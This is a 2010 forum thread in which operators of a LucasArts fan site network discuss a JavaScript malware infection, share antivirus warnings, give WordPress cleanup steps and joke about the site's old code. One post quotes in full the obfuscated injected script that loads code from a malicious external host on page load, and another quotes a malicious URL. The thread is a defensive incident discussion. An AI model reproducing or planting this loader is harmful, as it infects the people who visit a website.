LucasForums

LucasForums (http://www.lucasforums.com/index.php)
-   General Discussion (http://www.lucasforums.com/forumdisplay.php?f=185)
-   -   Mojo malware infection? (http://www.lucasforums.com/showthread.php?t=202950)

Harald B 03-03-2010 12:41 PM

Mojo malware infection?
 
Since this morning each time I try go to mixnmojo.com AVG warns me that its blocking a connection to a very dubious link; they vary slightly, with the following being a good example
Code:

winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php
(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.
Sorry if I should have posted this somewhere else. I'm not sure where that would be.

edit:I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Gabez 03-03-2010 02:34 PM

Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.

elTee 03-03-2010 03:09 PM

Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept reseting itself to 2 again. Remi was up all night changing it back :(

Gabez 03-04-2010 07:03 AM

It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code.

It's Chernobyl all over again.

Haggis 03-04-2010 08:51 AM

Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

bgbennyboy 03-04-2010 02:58 PM

Looks like its probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but its tried to copy itself to all index.php pages it seems.

Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

Harald B 03-04-2010 04:41 PM

Heads-up:I'm now also getting it when at the comments sections for individual blog posts and in the game database (ie it's spread to showfile.php and gamedb.php, presumably).

edit:Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good

Gabez 03-04-2010 04:45 PM

The infection is spreading!!!!

DO NOT PANIC.

jp-30 03-04-2010 05:38 PM

If only we had started building Mojo 10.

DJG 03-04-2010 10:50 PM

Don't blame the code.

Damn kids.

Valkian 03-05-2010 12:46 AM

I hate to say this Gabez... but I'M IN PANIC!!!
Both The Dig Museum and The Thrillville Quarterly are under attack!!

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

MJ 03-05-2010 01:08 AM

Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it. :)

QueZTone 03-05-2010 03:23 AM

haha DJG came out of hiding after all those years! my plan worked!


but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?

Harald B 03-05-2010 04:18 AM

Quote:

Originally Posted by QueZTone (Post 2710459)
but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?

Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.

diduz 03-05-2010 06:37 AM

Guys, the malware has attacked my laptop and I've been battling to save my system!!! :(

I won't go back to the site until it's safe again (I'm writing from another PC right now).

It seems to be some sort of fake virus alert.

Icebox 03-05-2010 02:05 PM

Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.

bgbennyboy 03-05-2010 02:16 PM

For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:
  • Delete the wp-admin and wp-includes folders
  • Download wordpress again and reupload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.

This is the code that was appended to my files:
Code:

<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->


Gabez 03-05-2010 02:28 PM

Oh my, DJG! Now I know that it's the end of days.

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/

daltysmilth 03-05-2010 03:14 PM

If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?

Harald B 03-05-2010 03:20 PM

Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.

Valkian 03-05-2010 03:24 PM

I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

Gabez 03-05-2010 03:29 PM

None of you are allowed in my panic shelter >:

elTee 03-05-2010 03:53 PM

Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.

MJ 03-05-2010 10:14 PM

I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.

Gabez 03-06-2010 05:02 AM

Yeah, but Nighlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway.

But it never hurts to make sure!

Serge 03-06-2010 10:40 AM

HighLand is infected too - and it certainly doesn't run on Wordpress - not sure Wordpress even existed when that site was made. Predates lowercase HTML too ;-)

And I don't remember the FTP account (as usual), so... :P

Gabez 03-06-2010 11:26 AM

Don't worry Serge, we'll fix it.

s-island 03-06-2010 11:28 AM

It's gone from Highland now. It infects all index*.php/html, default*.php/html and all JS files so all sites have at least one infected file.

Haggis 03-08-2010 08:48 AM

I'm getting strange pop-ups on the World of MI forums, but I can't see any files that have been infected. Maybe you guys can take a look at it, and also at World of MI itself, which I don't have access to?

Gabez 03-08-2010 09:34 AM

Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

But we'll get our best people on the case anyway.

Let us pray that the infection does not spread any further...

Valkian 03-08-2010 02:03 PM

Well, it seems that the Thrillville Quarterly and The Dig Museum are now both clear, thanks to my relentless efforts at containing the infection.
I know many of you were worried about that.

Haggis 03-08-2010 03:51 PM

Quote:

Originally Posted by Gabez (Post 2711184)
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

Or disgruntled fans are attacking the site because WMI sold out... :detective:

Quote:

But we'll get our best people on the case anyway.
Thanks! :thmbup1:

Gabez 03-08-2010 05:14 PM

Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...

Valkian 03-08-2010 06:03 PM

Oh, wait a minute, I thought Zaarin was Zaarin and now it turns out he is actually s-island? No wonder Zaarin never replied when I thanked him for something, he was the wrong Zaarin!
I would appreciate if there was some sort of press release explaining this things so I don't make myself look like a fool in the future (or rather, not any more than I already do).

Haggis 03-13-2010 08:16 AM

Quote:

Originally Posted by Gabez (Post 2711264)
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...

Sorry for the late reply, I've been offline due to sickness... the popups are being reported by several forum members, so they're not just on my end I'm afraid. I also recently updated the forum software when the latest version of phpBB came out, which was after the popup problem started appearing, but that didn't fix it. Perhaps I should try a clean install of phpBB, see if that will fix it.

s-island 03-13-2010 10:46 AM

I've run some scripts on all of Mojo's files that removes the javascript malware so things should be clean now. However, some JS files and probably some PHP/HTML files as well may have lost content. I know that Wordpress' PHP files have had the last ?> removed by the virus and some JS files have been completely emptied.

Maratanos 03-30-2010 08:36 AM

Hey, uh, guys? Was it your intention to send out an RSS feed item entitled "MOJO SUX" with a body linking to someplace that looks an awful lot like a spam site for pharmaceuticals?

EDIT: confirmed from a linux computer that there is a newspost too.

Gabez 03-30-2010 08:52 AM

Sorry about that, as far as I know it was just a news post that was added by someone (not anyone authorised), but it's gone now and we'll reset the passwords for everything tonight, srry again about this but we're working on the situation.

Jeff 03-30-2010 12:36 PM

Anyone receiving a trojan warning when they enter this thread? Odd that it is thread-specific but I just received two warnings in a row in this thread. Also, the ads aren't loading in this thread.

Kroms 03-30-2010 02:06 PM

Mojown'd :( I'm going to miss this site, when it finally hits the ****ter.


All times are GMT -4. The time now is 03:45 PM.

Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
LFNetwork, LLC ©2002-2011 - All rights reserved.